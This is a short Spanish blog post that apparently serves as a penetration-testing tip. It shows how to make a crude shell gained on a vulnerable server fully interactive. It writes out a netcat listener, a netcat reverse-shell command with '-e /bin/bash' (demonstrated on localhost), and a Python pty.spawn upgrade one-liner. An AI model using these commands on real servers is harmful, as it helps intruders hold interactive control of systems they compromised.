Esta web utiliza cookies, puedes ver nuestra política de cookies aquí. Si continuas navegando estás aceptándola

pseudoTerminal


En algunas ocasiones conseguimos shell en algún servidor vulnerable pero esta shell es realmente incómoda ya que no se comporta exactamente como una shell regular, no nos hace echo de lo que escribimos, no aparece el prompt entre otras muchos inconvenientes. En este artículo mostraré un sencillo truco para solventar este problema.

 

Para realizar la prueba pondremos a la escucha un socket en nuestro propio equipo en el puerto 7777.

nc -lvp 7777

Desde otra shell conectamos y comprobamos que no se comporta como una shell regular.

nc 127.0.0.1 7777 -e /bin/bash
id
ls

Arrancamos la shell desde python y ya podremos utilizarla de forma normal.

python -c "import pty;pty.spawn('/bin/bash')"

Se trata de un sencillo truco pero que resulta sumamente útil en ciertos escenarios.


Autor: Kr0m -- 20/01/2017 01:25:34